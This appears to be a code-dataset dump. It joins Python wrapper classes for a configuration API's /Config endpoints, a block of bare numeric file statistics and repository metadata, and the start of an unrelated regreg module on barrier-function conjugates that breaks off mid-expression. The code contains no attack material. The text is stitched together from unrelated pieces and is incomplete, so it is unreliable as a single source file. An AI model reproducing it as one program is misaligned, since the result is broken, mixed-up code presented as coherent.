                super().__init__(response=response)

            @property
            @api_response_property()
            def default_dn(self) -> str:
                return self._from_json(key='DefaultDN')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {'DefaultDN': default_dn}
        return _Response(response=self._post(data=payload))
class _Delete(API):
    """Endpoint wrapper for ``POST /Config/Delete``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/Delete')

    def post(self, object_dn: str, recursive: bool = False):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'Recursive': recursive,
        }
        return _Response(response=self._post(data=payload))
class _DnToGuid(API):
    """Endpoint wrapper for ``POST /Config/DnToGuid``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/DnToGuid')

    def post(self, object_dn: str):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def class_name(self) -> str:
                return self._from_json(key='ClassName')

            @property
            @api_response_property()
            def guid(self) -> str:
                return self._from_json(key='GUID')

            @property
            @api_response_property()
            def revision(self) -> str:
                return self._from_json(key='Revision')

            @property
            @api_response_property()
            def hierarchical_guid(self) -> str:
                return self._from_json(key='HierarchicalGUID')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {'ObjectDN': object_dn}
        return _Response(response=self._post(data=payload))
class _Enumerate(API):
    """Endpoint wrapper for ``POST /Config/Enumerate``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/Enumerate')

    def post(self, object_dn: str = None, recursive: bool = False, pattern: str = None):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def objects(self):
                return [Config.Object(item) for item in self._from_json(key='Objects')]

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'Recursive': recursive,
            'Pattern': pattern,
        }
        return _Response(response=self._post(data=payload))
class _EnumerateAll(API):
    """Endpoint wrapper for ``POST /Config/EnumerateAll``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/EnumerateAll')

    def post(self, pattern: str):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def objects(self):
                return [Config.Object(item) for item in self._from_json(key='Objects')]

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {'Pattern': pattern}
        return _Response(response=self._post(data=payload))
class _EnumerateObjectsDerivedFrom(API):
    """Endpoint wrapper for ``POST /Config/EnumerateObjectsDerivedFrom``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/EnumerateObjectsDerivedFrom')

    def post(self, derived_from: str, pattern: str = None, object_dn: str = None):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def objects(self):
                return [Config.Object(item) for item in self._from_json(key='Objects')]

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'DerivedFrom': derived_from,
            'Pattern': pattern,
        }
        return _Response(response=self._post(data=payload))
class _EnumeratePolicies(API):
    """Endpoint wrapper for ``POST /Config/EnumeratePolicies``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/EnumeratePolicies')

    def post(self, object_dn: str):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def policies(self):
                return [Config.Policy(item) for item in self._from_json(key='Policies')]

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {'ObjectDN': object_dn}
        return _Response(response=self._post(data=payload))
class _Find(API):
    """Endpoint wrapper for ``POST /Config/Find``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/Find')

    def post(self, pattern: str, attribute_names: str = None):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def objects(self):
                return [Config.Object(item) for item in self._from_json(key='Objects')]

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'Pattern': pattern,
            'AttributeNames': attribute_names,
        }
        return _Response(response=self._post(data=payload))
class _FindContainers(API):
    """Endpoint wrapper for ``POST /Config/FindContainers``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/FindContainers')

    def post(self, object_dn: str, recursive: bool = False):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def objects(self):
                return [Config.Object(item) for item in self._from_json(key='Objects')]

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'Recursive': recursive,
        }
        return _Response(response=self._post(data=payload))
class _FindObjectsOfClass(API):
    """Endpoint wrapper for ``POST /Config/FindObjectsOfClass``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/FindObjectsOfClass')

    def post(self, classes: str = None, class_name: str = None, object_dn: str = None, pattern: str = None, recursive: bool = False):
        # The endpoint needs at least one class filter; fail fast client-side.
        if not (classes or class_name):
            raise AssertionError('One of "classes" or "class_name" parameters must be provided.')

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def objects(self):
                return [Config.Object(item) for item in self._from_json(key='Objects')]

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'Classes': classes,
            'Class': class_name,
            'ObjectDN': object_dn,
            'Pattern': pattern,
            'Recursive': recursive,
        }
        return _Response(response=self._post(data=payload))
class _FindPolicy(API):
    """Endpoint wrapper for ``POST /Config/FindPolicy``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/FindPolicy')

    def post(self, object_dn: str, class_name: str, attribute_name: str):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def locked(self) -> bool:
                return self._from_json(key='Locked')

            @property
            @api_response_property()
            def policy_dn(self) -> str:
                return self._from_json(key='PolicyDN')

            @property
            @api_response_property()
            def values(self) -> List[str]:
                return self._from_json(key='Values')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'Class': class_name,
            'AttributeName': attribute_name,
        }
        return _Response(response=self._post(data=payload))
class _GetHighestRevision(API):
    """Wrapper for the POST /Config/GetHighestRevision endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/GetHighestRevision')

    def post(self, object_dn: str, classes: str = None):
        body = {
            "ObjectDN": object_dn,
            'Classes': classes
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def revision(self) -> str:
                return self._from_json(key='Revision')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _GetRevision(API):
    """Wrapper for the POST /Config/GetRevision endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/GetRevision')

    def post(self, object_dn: str):
        body = {
            "ObjectDN": object_dn
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def revision(self) -> str:
                return self._from_json(key='Revision')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _GuidToDn(API):
    """Wrapper for the POST /Config/GuidToDn endpoint (resolve a GUID to its DN)."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/GuidToDn')

    def post(self, object_guid: str):
        body = {
            "ObjectGUID": object_guid
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def object_dn(self) -> str:
                return self._from_json(key='ObjectDN')

            @property
            @api_response_property()
            def class_name(self) -> str:
                return self._from_json(key='ClassName')

            @property
            @api_response_property()
            def revision(self) -> str:
                return self._from_json(key='Revision')

            @property
            @api_response_property()
            def hierarchical_guid(self) -> str:
                return self._from_json(key='HierarchicalGUID')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _IdInfo(API):
    """Wrapper for the POST /Config/IdInfo endpoint (lookup object metadata by ID)."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/IdInfo')

    def post(self, object_id: str):
        body = {
            "ObjectID": object_id
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def guid(self) -> str:
                return self._from_json(key='GUID')

            @property
            @api_response_property()
            def class_name(self) -> str:
                return self._from_json(key='ClassName')

            @property
            @api_response_property()
            def revision(self) -> str:
                return self._from_json(key='Revision')

            @property
            @api_response_property()
            def hierarchical_guid(self) -> str:
                return self._from_json(key='HierarchicalGUID')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _IsValid(API):
    """Wrapper for the POST /Config/IsValid endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/IsValid')

    def post(self, object_dn: str = None, object_guid: str = None):
        """Validate an object by DN or GUID; at least one must be provided."""
        if not (object_dn or object_guid):
            # Bug fix: the message was copy-pasted from _FindObjectsOfClass and
            # referred to "classes"/"class_name", which are not parameters here.
            raise AssertionError('One of "object_dn" or "object_guid" parameters must be provided.')
        body = {
            "ObjectGUID": object_guid,
            "ObjectDN": object_dn
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def object(self):
                return Config.Object(self._from_json(key='Object'))

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _MutateObject(API):
    """Wrapper for the POST /Config/MutateObject endpoint (change an object's class)."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/MutateObject')

    def post(self, object_dn: str, class_name: str):
        body = {
            "ObjectDN": object_dn,
            "Class": class_name
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _Read(API):
    """Wrapper for the POST /Config/Read endpoint (read one attribute of an object)."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/Read')

    def post(self, object_dn: str, attribute_name: str):
        body = {
            "ObjectDN": object_dn,
            "AttributeName": attribute_name
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def object_dn(self) -> str:
                return self._from_json(key='ObjectDN')

            @property
            @api_response_property()
            def attribute_name(self) -> str:
                return self._from_json(key='AttributeName')

            @property
            @api_response_property()
            def values(self) -> List[str]:
                return self._from_json(key='Values')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _ReadAll(API):
    """Wrapper for the POST /Config/ReadAll endpoint (read all attributes of an object)."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/ReadAll')

    def post(self, object_dn: str):
        body = {
            "ObjectDN": object_dn
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def name_values(self):
                return [Config.NameValues(nv) for nv in self._from_json(key='NameValues')]

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _ReadDn(API):
    """Wrapper for the POST /Config/ReadDn endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/ReadDn')

    def post(self, object_dn: str, attribute_name: str):
        body = {
            "ObjectDN": object_dn,
            "AttributeName": attribute_name
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def values(self) -> List[str]:
                return self._from_json(key='Values')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _ReadDnReferences(API):
    """Wrapper for the POST /Config/ReadDnReferences endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/ReadDnReferences')

    def post(self, object_dn: str, reference_attribute_name: str, attribute_name: str):
        body = {
            "ObjectDN": object_dn,
            "ReferenceAttributeName": reference_attribute_name,
            "AttributeName": attribute_name
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def values(self) -> List[str]:
                # Falls back to an empty list when the key is absent/errored.
                return self._from_json(key='Values', return_on_error=list)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _ReadEffectivePolicy(API):
    """Wrapper for the POST /Config/ReadEffectivePolicy endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/ReadEffectivePolicy')

    def post(self, object_dn: str, attribute_name: str):
        body = {
            "ObjectDN": object_dn,
            "AttributeName": attribute_name
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def values(self) -> List[str]:
                return self._from_json(key='Values')

            @property
            @api_response_property()
            def locked(self) -> bool:
                return self._from_json(key='Locked')

            @property
            @api_response_property()
            def overridden(self) -> bool:
                return self._from_json(key='Overridden')

            @property
            @api_response_property()
            def policy_dn(self) -> str:
                return self._from_json(key='PolicyDN')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _ReadPolicy(API):
    """Wrapper for the POST /Config/ReadPolicy endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/ReadPolicy')

    def post(self, object_dn: str, attribute_name: str, class_name: str):
        body = {
            "ObjectDN": object_dn,
            "AttributeName": attribute_name,
            "Class": class_name
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def locked(self) -> bool:
                return self._from_json(key='Locked')

            @property
            @api_response_property()
            def values(self) -> List[str]:
                # Falls back to an empty list when the key is absent/errored.
                return self._from_json(key='Values', return_on_error=list)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _RemoveDnValue(API):
    """Wrapper for the POST /Config/RemoveDnValue endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/RemoveDnValue')

    def post(self, object_dn: str, attribute_name: str, value: str):
        body = {
            "ObjectDN": object_dn,
            "AttributeName": attribute_name,
            "Value": value
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _RemovePolicyValue(API):
    """Wrapper for the POST /Config/RemovePolicyValue endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/RemovePolicyValue')

    def post(self, object_dn: str, attribute_name: str, class_name: str, value: str):
        body = {
            "ObjectDN": object_dn,
            "AttributeName": attribute_name,
            "Class": class_name,
            "Value": value
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _RenameObject(API):
    """Wrapper for the POST /Config/RenameObject endpoint (also used to move objects)."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/RenameObject')

    def post(self, object_dn: str, new_object_dn: str):
        body = {
            "ObjectDN": object_dn,
            "NewObjectDN": new_object_dn
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _Write(API):
    """Wrapper for the POST /Config/Write endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/Write')

    def post(self, object_dn: str, attribute_data: dict):
        body = {
            "ObjectDN": object_dn,
            "AttributeData": attribute_data
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _WriteDn(API):
    """Wrapper for the POST /Config/WriteDn endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/WriteDn')

    def post(self, object_dn: str, attribute_name: str, values: List[str]):
        body = {
            "ObjectDN": object_dn,
            "AttributeName": attribute_name,
            "Values": values
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
class _WritePolicy(API):
    """Wrapper for the POST /Config/WritePolicy endpoint."""
    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/WritePolicy')

    def post(self, object_dn: str, class_name: str, attribute_name: str, locked: bool = False, values: str = None):
        body = {
            "ObjectDN": object_dn,
            "Class": class_name,
            "AttributeName": attribute_name,
            "Locked": locked,
            "Values": values
        }

        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        return _Response(response=self._post(data=body))
| 35.62069
| 137
| 0.527401
| 3,507
| 37,188
| 5.181637
| 0.035643
| 0.060092
| 0.0826
| 0.115893
| 0.843055
| 0.806405
| 0.795179
| 0.785439
| 0.776139
| 0.766839
| 0
| 0
| 0.373561
| 37,188
| 1,043
| 138
| 35.654842
| 0.780048
| 0
| 0
| 0.747239
| 0
| 0
| 0.058298
| 0.009439
| 0
| 0
| 0
| 0
| 0.002454
| 1
| 0.233129
| false
| 0
| 0.003681
| 0.095706
| 0.469939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f8b2a0596d7c463b3cdce1255751df03d69081b4
| 23,828
|
py
|
Python
|
selectinf/sandbox/bayesian/barrier.py
|
TianXie1999/selective-inference
|
ca02bbd84af5f5597944c75bde8337db9c69066a
|
[
"BSD-3-Clause"
] | 51
|
2016-03-31T16:34:15.000Z
|
2022-01-16T04:32:58.000Z
|
selectinf/sandbox/bayesian/barrier.py
|
TianXie1999/selective-inference
|
ca02bbd84af5f5597944c75bde8337db9c69066a
|
[
"BSD-3-Clause"
] | 11
|
2016-04-07T00:19:58.000Z
|
2021-10-03T18:31:14.000Z
|
selectinf/sandbox/bayesian/barrier.py
|
TianXie1999/selective-inference
|
ca02bbd84af5f5597944c75bde8337db9c69066a
|
[
"BSD-3-Clause"
] | 14
|
2015-10-28T17:29:05.000Z
|
2021-08-16T21:04:30.000Z
|
import numpy as np
import regreg.api as rr
from scipy.optimize import bisect, minimize
def cube_barrier_scaled(argument, lagrange, cube_scale=1.):
    r'''
    Barrier approximation to the
    cube $[-\lambda,\lambda]^k$ with $\lambda$ being `lagrange`.

    With `cube_scale` s, the function is

    $$
    z \mapsto \log(1 + s\lambda / (\lambda - z)) + \log(1 + s\lambda / (z + \lambda))
    $$

    with $z$ being `argument` (summed over coordinates).  A large constant is
    added when any coordinate violates the open cube, so line searches reject
    infeasible proposals.

    Fix: the docstring is now a raw string — the original non-raw docstring
    contained invalid escape sequences (``\l``) and a literal tab from ``\t``.
    '''
    BIG = 10 ** 10  # our Newton method will never evaluate this
                    # with any violations, but `scipy.minimize` does
    _diff = argument - lagrange  # z - \lambda < 0
    _sum = argument + lagrange   # z + \lambda > 0
    violations = ((_diff >= 0).sum() + (_sum <= 0).sum() > 0)
    return np.log((_diff - (cube_scale * lagrange)) * (_sum + (cube_scale * lagrange)) / (_diff * _sum)).sum() + BIG * violations
def cube_gradient_scaled(argument, lagrange, cube_scale=1.):
    r"""
    Gradient of `cube_barrier_scaled` with respect to `argument`,
    for the cube $[-\lambda,\lambda]^k$ with $\lambda$ being `lagrange`.

    Computed coordinate-wise as

    $$
    \frac{1}{z - \lambda - s\lambda} - \frac{1}{z - \lambda}
    + \frac{1}{z + \lambda + s\lambda} - \frac{1}{z + \lambda}
    $$

    where $s$ is `cube_scale` and $z$ is `argument`.
    """
    shift = cube_scale * lagrange
    below = argument - lagrange  # z - \lambda < 0
    above = argument + lagrange  # z + \lambda > 0
    lower_part = 1. / (below - shift) - 1. / below
    upper_part = 1. / (above + shift) - 1. / above
    return lower_part + upper_part
def cube_hessian_scaled(argument, lagrange, cube_scale=1.):
    r"""
    Diagonal Hessian of `cube_barrier_scaled` with respect to `argument`,
    for the cube $[-\lambda,\lambda]^k$ with $\lambda$ being `lagrange`.

    Coordinate-wise second derivative of the barrier; only the diagonal is
    returned since the barrier is separable across coordinates.
    (The original docstring repeated the gradient formula; see
    `cube_gradient_scaled` for the first derivative.)
    """
    shift = cube_scale * lagrange
    below = argument - lagrange  # z - \lambda < 0
    above = argument + lagrange  # z + \lambda > 0
    lower_part = 1. / below ** 2 - 1. / (below - shift) ** 2
    upper_part = 1. / above ** 2 - 1. / (above + shift) ** 2
    return lower_part + upper_part
def cube_barrier_softmax_coord(z, lam):
_diff = z - lam
_sum = z + lam
if -lam + np.power(10, -10) < z < lam - np.power(10, -10):
return np.log((_diff - 1.) * (_sum + 1.) / (_diff * _sum))
else:
return 2 * np.log(1+(10 ** 10))
class barrier_conjugate_log(rr.smooth_atom):
    r"""
    Conjugate of a barrier for the
    product $[0,\infty)^E \times [-\lambda,\lambda]^{-E}$.

    The conjugate splits into an orthant part (closed form) and a cube part
    (closed form for this log-barrier variant).
    """
    def __init__(self,
                 cube_bool,  # -E
                 lagrange,  # cube half lengths
                 barrier_scale=None,  # maybe scale each coordinate in future?
                 coef=1.,
                 offset=None,
                 quadratic=None):
        p = cube_bool.shape[0]
        orthant_bool = ~cube_bool
        initial = np.ones(p)
        # Start cube coordinates at half the lagrange (strictly feasible).
        initial[cube_bool] = lagrange * 0.5
        if barrier_scale is None:
            barrier_scale = 1.
        (self.cube_bool,
         self.orthant_bool,
         self.lagrange,
         self.barrier_scale) = (cube_bool,
                                orthant_bool,
                                lagrange,
                                barrier_scale)
        rr.smooth_atom.__init__(self,
                                (p,),
                                offset=offset,
                                quadratic=quadratic,
                                initial=initial,
                                coef=coef)

    def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-6):
        """Evaluate conjugate value and/or gradient at `arg` (mode: 'func'/'grad'/'both')."""
        # here we compute those expressions in the note
        arg = self.apply_offset(arg)  # all smooth_objectives should do this....
        cube_arg = arg[self.cube_bool]
        orthant_arg = arg[self.orthant_bool]

        # Conjugate is +inf (gradient undefined) outside the negative orthant.
        if check_feasibility and np.any(orthant_arg >= -tol):
            if mode == 'func':
                return np.inf
            elif mode == 'grad':
                return np.nan * np.ones(self.shape)
            elif mode == 'both':
                return np.inf, np.nan * np.ones(self.shape)
            else:
                raise ValueError('mode incorrectly specified')

        # Closed-form maximizers for both pieces.
        orthant_maximizer = - 0.5 + np.sqrt(0.25 - 1. / orthant_arg)
        orthant_val = np.sum(orthant_maximizer * orthant_arg -
                             np.log(1 + 1. / orthant_maximizer))
        cube_maximizer = -1. / cube_arg + np.sign(cube_arg) * np.sqrt(1. / cube_arg ** 2 + self.lagrange ** 2)
        cube_val = np.sum(cube_maximizer * cube_arg + np.log(self.lagrange - cube_maximizer) +
                          np.log(self.lagrange + cube_maximizer) - (2 * np.log(self.lagrange)))

        if mode == 'func':
            return cube_val + orthant_val
        elif mode == 'grad':
            g = np.zeros(self.shape)
            g[self.cube_bool] = cube_maximizer
            g[self.orthant_bool] = orthant_maximizer
            return g
        elif mode == 'both':
            g = np.zeros(self.shape)
            g[self.cube_bool] = cube_maximizer
            g[self.orthant_bool] = orthant_maximizer
            return cube_val + orthant_val, g
        else:
            raise ValueError('mode incorrectly specified')
class barrier_conjugate_softmax(rr.smooth_atom):
    r"""
    Conjugate of a softmax barrier for the
    product $[0,\infty)^E \times [-\lambda,\lambda]^{-E}$.

    The orthant part has a closed-form maximizer; the cube part is solved
    coordinate-wise by root-finding on the stationarity condition.
    """
    def __init__(self,
                 cube_bool,  # -E
                 lagrange,  # cube half lengths
                 barrier_scale=None,  # maybe scale each coordinate in future?
                 coef=1.,
                 offset=None,
                 quadratic=None):
        p = cube_bool.shape[0]
        orthant_bool = ~cube_bool
        initial = np.ones(p)
        # NOTE(review): chained assignment — self._initial holds lagrange * 0.5,
        # not the `initial` array; nothing active reads self._initial.
        self._initial = initial[cube_bool] = lagrange * 0.5
        if barrier_scale is None:
            barrier_scale = 1.
        (self.cube_bool,
         self.orthant_bool,
         self.lagrange,
         self.barrier_scale) = (cube_bool,
                                orthant_bool,
                                lagrange,
                                barrier_scale)
        rr.smooth_atom.__init__(self,
                                (p,),
                                offset=offset,
                                quadratic=quadratic,
                                initial=initial,
                                coef=coef)

    def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-6):
        """Evaluate conjugate value and/or gradient at `arg` (mode: 'func'/'grad'/'both')."""
        # here we compute those expressions in the note
        arg = self.apply_offset(arg)  # all smooth_objectives should do this....
        cube_arg = arg[self.cube_bool]
        orthant_arg = arg[self.orthant_bool]

        if check_feasibility and np.any(orthant_arg >= -tol):
            if mode == 'func':
                return np.inf
            elif mode == 'grad':
                return np.nan * np.ones(self.shape)
            elif mode == 'both':
                return np.inf, np.nan * np.ones(self.shape)
            else:
                raise ValueError('mode incorrectly specified')

        orthant_maximizer = - 0.5 + np.sqrt(0.25 - 1. / orthant_arg)
        orthant_val = np.sum(orthant_maximizer * orthant_arg -
                             np.log(1 + 1. / orthant_maximizer))

        def cube_conjugate_grad(z, u, j):
            # Stationarity condition u = barrier'(z) for coordinate j.
            _diff = z - self.lagrange[j]  # z - \lambda < 0
            _sum = z + self.lagrange[j]  # z + \lambda > 0
            return u - (1. / (_diff - self.lagrange[j]) - 1. / _diff + 1. / (_sum + self.lagrange[j]) - 1. / _sum)

        cube_maximizer = np.zeros(cube_arg.shape[0])
        for i in range(cube_arg.shape[0]):
            u = cube_arg[i]
            j = i
            # Root of the gradient inside the open cube (endpoints nudged in).
            cube_maximizer[i] = bisect(cube_conjugate_grad, a=-self.lagrange[j] + 1e-10,
                                       b=self.lagrange[j] - 1e-10, args=(u, j),
                                       rtol=4.4408920985006262e-5, maxiter=32)

        # Bug fix: the original wrote `self.lagrange / self.lagrange - cube_maximizer`,
        # which evaluates as `1 - cube_maximizer`.  The intended term (consistent
        # with barrier_conjugate_softmax_scaled at cube_scale=1 and with the
        # gradient above) is lagrange / (lagrange -+ cube_maximizer).
        cube_val = np.sum(cube_maximizer * cube_arg
                          - np.log(1. + (self.lagrange / (self.lagrange - cube_maximizer)))
                          - np.log(1. + (self.lagrange / (self.lagrange + cube_maximizer))))

        if mode == 'func':
            return cube_val + orthant_val
        elif mode == 'grad':
            g = np.zeros(self.shape)
            g[self.cube_bool] = cube_maximizer
            g[self.orthant_bool] = orthant_maximizer
            return g
        elif mode == 'both':
            g = np.zeros(self.shape)
            g[self.cube_bool] = cube_maximizer
            g[self.orthant_bool] = orthant_maximizer
            return cube_val + orthant_val, g
        else:
            raise ValueError('mode incorrectly specified')
class barrier_conjugate_softmax_scaled(rr.smooth_atom):
    r"""
    Conjugate of a scaled softmax barrier for the
    product $[0,\infty)^E \times [-\lambda,\lambda]^{-E}$.

    Like `barrier_conjugate_softmax` but the cube barrier width is scaled by
    `cube_scale` and the orthant barrier by `barrier_scale`.
    """
    def __init__(self,
                 cube_bool,  # -E
                 lagrange,  # cube half lengths
                 cube_scale=1.,
                 barrier_scale=1.,  # maybe scale each coordinate in future?
                 coef=1.,
                 offset=None,
                 quadratic=None):
        p = cube_bool.shape[0]
        orthant_bool = ~cube_bool
        initial = np.ones(p)
        # NOTE(review): chained assignment — self._initial holds lagrange * 0.5,
        # not the `initial` array; only the commented-out solver below reads it.
        self._initial = initial[cube_bool] = lagrange * 0.5
        if barrier_scale is None:
            barrier_scale = 1.
        (self.cube_bool,
         self.orthant_bool,
         self.lagrange,
         self.cube_scale,
         self.barrier_scale) = (cube_bool,
                                orthant_bool,
                                lagrange,
                                cube_scale,
                                barrier_scale)
        rr.smooth_atom.__init__(self,
                                (p,),
                                offset=offset,
                                quadratic=quadratic,
                                initial=initial,
                                coef=coef)

    def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-12):
        """Evaluate conjugate value and/or gradient at `arg` (mode: 'func'/'grad'/'both')."""
        # here we compute those expressions in the note
        arg = self.apply_offset(arg)  # all smooth_objectives should do this....
        cube_arg = arg[self.cube_bool]
        orthant_arg = arg[self.orthant_bool]

        if check_feasibility and np.any(orthant_arg >= -tol):
            raise ValueError('returning nan gradient')
            # NOTE(review): everything below the raise is unreachable — it looks
            # like the pre-raise inf/nan return path was left in place.
            if mode == 'func':
                return np.inf
            elif mode == 'grad':
                return np.nan * np.ones(self.shape)
            elif mode == 'both':
                return np.inf, np.nan * np.ones(self.shape)
            else:
                raise ValueError('mode incorrectly specified')

        orthant_maximizer = (- 0.5 * self.barrier_scale) + np.sqrt((0.25 * (self.barrier_scale ** 2)) -
                                                                   (self.barrier_scale / orthant_arg))
